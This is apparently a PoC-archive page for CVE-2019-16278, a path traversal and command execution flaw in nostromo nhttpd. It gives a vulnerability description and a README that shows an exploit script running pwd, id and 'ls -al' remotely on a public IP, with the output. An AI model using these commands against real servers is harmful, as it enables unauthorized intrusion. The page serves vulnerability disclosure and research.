Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-16278 PoC — nostromo nhttpd 路径遍历漏洞

Source
Associated Vulnerability
Title:nostromo nhttpd 路径遍历漏洞 (CVE-2019-16278)
Description:nostromo nhttpd是一款开源的Web服务器。 nostromo nhttpd 1.9.6及之前版本中的‘http_verify’函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
Description
CVE-2019-16278Nostromo httpd命令执行
Readme
# CVE-2019-16278
CVE-2019-16278Nostromo httpd命令执行  
➜  Downloads python nostromo.py 114.114.114.114 8080 pwd  
/bin
➜  Downloads python nostromo.py 114.114.114.114 8080 id
uid=65534 gid=65534
➜  Downloads python nostromo.py 114.114.114.114 8080 "ls -al"
drwxr-xr-x    2 0        0                0 Apr 12  2013 .
drwxr-xr-x   16 0        0                0 Jan  1  1970 ..
lrwxrwxrwx    1 0        0                7 Apr 12  2013 ash -> busybox
File Snapshot

[4.0K] /data/pocs/406ca5dc5df25d158eb21f34b26e4e1f85cc6729 ├── [1.2K] cve-2019-16278.py └── [ 459] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.